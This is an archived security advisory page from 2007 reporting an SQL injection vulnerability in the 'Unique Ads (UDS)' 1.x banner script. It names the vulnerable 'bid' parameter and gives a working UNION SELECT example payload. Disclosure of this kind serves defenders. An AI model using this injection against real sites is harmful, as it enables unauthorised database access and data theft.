Computer Security

Security Advisory: SQL Injection in Unique Ads ( UDS )
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Maxtricity Tagger Password Disclosure Vulnerability

  ZixForum <= 1.14 (Zixforum.
mdb) Remote Password Disclosure Vulnerability

  [Full-disclosure] [OPENADS-SA-2007-
001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

  Toxiclab Shoutbox Password Disclosure Vulnerability

From:xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com>
Date:24.01.2007
Subject:SQL Injection in Unique Ads ( UDS )

Hello
Vulnerable : uds
Version: 1.x
web : http://www.egyptechno.com

The bug :
http://example.com/uds/banner.php?bid=[SQL]

Example :
http://example.com/uds/banner.php?bid=-55%20union%20select%20null,
null,null%20from%20uds


,,,,,,,
Discoverey By : Linux_Drox
www.LeZr.com

Best Regards ,,
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 


Rating@Mail.ru